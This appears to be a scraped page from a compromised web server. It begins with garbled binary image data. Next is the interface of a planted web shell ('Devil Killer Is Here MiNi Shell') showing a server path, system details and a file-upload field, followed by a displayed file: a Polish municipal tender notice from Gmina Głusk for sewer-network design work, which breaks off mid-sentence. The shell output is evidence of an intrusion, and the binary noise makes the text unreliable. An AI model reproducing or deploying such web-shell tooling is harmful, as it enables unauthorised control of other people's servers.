JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210513/0005391601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00053916 z dnia 2021-05-13</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie kompleksowej dokumentacji projektowejdla budowy sieci kanalizacji sanitarnej w miejscowościachKalinówka i Abramowice Prywatne”(3) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GŁUSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019980</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dominów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-388</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+4881-75-18-760</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+4881-75-18-650</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@glusk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">glusk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie kompleksowej dokumentacji projektowejdla budowy sieci kanalizacji sanitarnej w miejscowościachKalinówka i Abramowice Prywatne”(3) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b2af510d-b3d2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00053916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003796/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Wykonanie kompleksowej dokumentacji projektowej dla budowy sieci kanalizacji sanitarnej w miejscowościach Kalinówka i Abramowice Prywatne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugglusk.bip.lubelskie.pl/index.php?id=82 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencjielektronicznejprzekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortaludostępnympod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz RegulaminieePUAP.Wpostępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż ofertaWykonawcy izałączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanegoformularzadostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularzdokomunikacji).Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.Wewszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcyposługująsię numerem ogłoszenia (BZP).Zamawiający może również komunikować się zWykonawcami zapomocąpoczty elektronicznej, email: sekretariat@glusk.pl Dokumenty elektroniczne,oświadczenia lubelektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę zapośrednictwemFormularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwośćskładaniadokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów luboświadczeń zapomocą poczty elektronicznej, na adres email: sekretariat@glusk.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XX SWZ. Zgodnie z art. 13 ust. 1 i 2rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochroniedanych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:1.Administratorem Pani/Pana danych osobowych jest Gmina Głusk, ul. Rynek 1, 20-388 Dominów, email:sekretariat@gusk.pl, nr tel.: 817518760, fax: 817518650.2. W sprawach z zakresu ochronydanych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem email:inspektor@cbi24.pl3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem oudzielenie zamówienia publicznego. 4. Dane osobowe będą przetwarzane przez okres zgodnie z art.78 ust. 1 i 4 ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz.2019), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czasobowiązywania umowy.5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww.Rozporządzenia w związku z przepisami PZP.6. Odbiorcami Pani/Pana danych będą osoby lubpodmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74ust. 4 PZP.7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Panadotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem wpostępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danychwynikają z PZP. 8. Osoba, której dane dotyczą ma prawo do: - dostępu do treści swoich danych orazmożliwości ich poprawiania, sprostowania, ograniczenia przetwarzania, - w przypadku gdyprzetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesieniaskargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193Warszawa,9. Osobie, której dane dotyczą nie przysługuje:- w związku z art. 17 ust. 3 lit. b, d lub eRozporządzenia prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych,o którym mowa w art. 20 Rozporządzenia;- na podstawie art. 21 Rozporządzenia prawo sprzeciwu,wobec przetwarzania danych osobowych.SEKCJA IV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej dla budowy sieci kanalizacji sanitarnej w miejscowości Kalinówka i Abramowice Prywatne oraz sprawowanie nadzoru autorskiego w toku realizacji robót budowlanych na podstawie tej dokumentacji. Zakres prac obejmuje zaprojektowanie głównych kolektorów kanalizacji sanitarnej grawitacyjnej wraz z odcinkami tłocznymi i tłoczni ścieków, włączonych do istniejącej sieci kanalizacji sanitarnej w Kalinówce.Część nr 1 – Obszar centralny Kalinówki – obejmuje teren przyległy do drogi szkolnej, zawarty pomiędzy ulicami ul. Lipową, Klonową, Porannej Rosy – na załączniku graficznym zaznaczony kolorem różowym; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7) ustawy Pzp, o wartości nie większej niż 50% wartości szacunkowej zamówienia podstawowego, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, polegającego na powtórzeniu podobnych usług polegających na opracowaniu dokumentacji projektowej kanalizacji sanitarnej wraz z materiałami niezbędnymi do uzyskania potwierdzenia zgłoszenia robót w Starostwie Powiatowym, obejmującej m.in. •	wykonanie mapy do celów projektowych lub ewentualnej aktualizacji,•	wykonanie projektu koncepcyjnego,•	wykonanie projektu budowlanego,•	uzyskanie wymaganych zgód, opinii, uzgodnień i pozwoleń,• opracowanie dokumentacji środowiskowej, •	wykonanie dokumentacji geotechnicznej,•	wykonanie Specyfikacji Technicznych, przedmiarów, kosztorysów inwestorskich,• sprawowanie nadzoru autorskiego.Udzielenie zamówień podobnych będzie uzależnione od zaistnienia takiej konieczności i posiadania przez Zamawiającego środków finansowych. Zamówienie zostało przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i będzie zgodne z jego przedmiotem. Całkowita wartość tego zamówienia została uwzględniona przy obliczaniu wartości zamówienia podstawowego. Warunki udzielenia zamówienia:a)	zamówienie zostanie udzielone po przeprowadzeniu procedury przewidzianej dla zamówienia z wolnej ręki, w szczególności poprzez zaproszenie wykonawcy do negocjacji oraz negocjacje z wykonawcą;b)	dotychczasowy wykonawca realizował usługi objęte zamówieniem podstawowym w terminie i z najwyższą starannością,c)	wykonawca będzie musiał wykazać spełnienie warunków udziału w postępowaniu, które zostaną określone przez Zamawiającego, oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie spełnienia tych warunków, w zakresie określonym przez Zamawiającego;d)	wykonawca będzie musiał wykazać brak podstaw do wykluczenia oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie braku podstaw do wykluczenia,e)	wykonawca będzie zobowiązany zapewnić nie gorszy standard wykonywania nowego zamówienia niż podstawowego oraz zaakceptować istotne postanowienia dotychczasowej umowy o zamówienie podstawowe,f)	przedmiotem negocjacji z wykonawcą będą w szczególności: oferowana przez wykonawcę cena oraz szczegółowe warunki realizacji zamówienia (w tym termin wykonania zamówienia oraz okresu gwarancji jakości) z zachowaniem wymogów określonych przez Zamawiającego w opisie przedmiotu zamówienia i warunkach przyszłej umowy o zamówienie publiczne.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za pomocą kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Za pomocą kryteriów oceny ofert <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej dla budowy sieci kanalizacji sanitarnej w miejscowości Kalinówka i Abramowice Prywatne oraz sprawowanie nadzoru autorskiego w toku realizacji robót budowlanych na podstawie tej dokumentacji. Zakres prac obejmuje zaprojektowanie głównych kolektorów kanalizacji sanitarnej grawitacyjnej wraz z odcinkami tłocznymi i tłoczni ścieków, włączonych do istniejącej sieci kanalizacji sanitarnej w Kalinówce.Część nr 2 – Obszar południowy Kalinówki – obejmuje teren przyległy do Części nr 1, zawiera się pomiędzy ulicami Modrzewiową, Sosnową, Orzechową, Lipową i Nasturcjową – na załączniku graficznym zaznaczony kolorem zielonym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7) ustawy Pzp, o wartości nie większej niż 50% wartości szacunkowej zamówienia podstawowego, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, polegającego na powtórzeniu podobnych usług polegających na opracowaniu dokumentacji projektowej kanalizacji sanitarnej wraz z materiałami niezbędnymi do uzyskania potwierdzenia zgłoszenia robót w Starostwie Powiatowym, obejmującej m.in. •	wykonanie mapy do celów projektowych lub ewentualnej aktualizacji,•	wykonanie projektu koncepcyjnego,•	wykonanie projektu budowlanego,•	uzyskanie wymaganych zgód, opinii, uzgodnień i pozwoleń,• opracowanie dokumentacji środowiskowej, •	wykonanie dokumentacji geotechnicznej,•	wykonanie Specyfikacji Technicznych, przedmiarów, kosztorysów inwestorskich,• sprawowanie nadzoru autorskiego.Udzielenie zamówień podobnych będzie uzależnione od zaistnienia takiej konieczności i posiadania przez Zamawiającego środków finansowych. Zamówienie zostało przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i będzie zgodne z jego przedmiotem. Całkowita wartość tego zamówienia została uwzględniona przy obliczaniu wartości zamówienia podstawowego. Warunki udzielenia zamówienia:a)	zamówienie zostanie udzielone po przeprowadzeniu procedury przewidzianej dla zamówienia z wolnej ręki, w szczególności poprzez zaproszenie wykonawcy do negocjacji oraz negocjacje z wykonawcą;b)	dotychczasowy wykonawca realizował usługi objęte zamówieniem podstawowym w terminie i z najwyższą starannością,c)	wykonawca będzie musiał wykazać spełnienie warunków udziału w postępowaniu, które zostaną określone przez Zamawiającego, oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie spełnienia tych warunków, w zakresie określonym przez Zamawiającego;d)	wykonawca będzie musiał wykazać brak podstaw do wykluczenia oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie braku podstaw do wykluczenia,e)	wykonawca będzie zobowiązany zapewnić nie gorszy standard wykonywania nowego zamówienia niż podstawowego oraz zaakceptować istotne postanowienia dotychczasowej umowy o zamówienie podstawowe,f)	przedmiotem negocjacji z wykonawcą będą w szczególności: oferowana przez wykonawcę cena oraz szczegółowe warunki realizacji zamówienia (w tym termin wykonania zamówienia oraz okresu gwarancji jakości) z zachowaniem wymogów określonych przez Zamawiającego w opisie przedmiotu zamówienia i warunkach przyszłej umowy o zamówienie publiczne.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za pomocą kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Za pomocą kryteriów oceny ofert <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej dla budowy sieci kanalizacji sanitarnej w miejscowości Kalinówka i Abramowice Prywatne oraz sprawowanie nadzoru autorskiego w toku realizacji robót budowlanych na podstawie tej dokumentacji. Zakres prac obejmuje zaprojektowanie głównych kolektorów kanalizacji sanitarnej grawitacyjnej wraz z odcinkami tłocznymi i tłoczni ścieków, włączonych do istniejącej sieci kanalizacji sanitarnej w Kalinówce.Część nr 3 – Obszar północny Kalinówki - wzdłuż drogi serwisowej drogi krajowej nr 19 i powiatowej ulicy Piaseckiej, graniczy z Częścią nr 1, zawiera fragmenty ulic przyległych Magnoliowej, Lipowej z ul. Cyprysową i Wspólną – na załączniku graficznym zaznaczony kolorem niebieskim. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7) ustawy Pzp, o wartości nie większej niż 50% wartości szacunkowej zamówienia podstawowego, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, polegającego na powtórzeniu podobnych usług polegających na opracowaniu dokumentacji projektowej kanalizacji sanitarnej wraz z materiałami niezbędnymi do uzyskania potwierdzenia zgłoszenia robót w Starostwie Powiatowym, obejmującej m.in. •	wykonanie mapy do celów projektowych lub ewentualnej aktualizacji,•	wykonanie projektu koncepcyjnego,•	wykonanie projektu budowlanego,•	uzyskanie wymaganych zgód, opinii, uzgodnień i pozwoleń,• opracowanie dokumentacji środowiskowej, •	wykonanie dokumentacji geotechnicznej,•	wykonanie Specyfikacji Technicznych, przedmiarów, kosztorysów inwestorskich,• sprawowanie nadzoru autorskiego.Udzielenie zamówień podobnych będzie uzależnione od zaistnienia takiej konieczności i posiadania przez Zamawiającego środków finansowych. Zamówienie zostało przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i będzie zgodne z jego 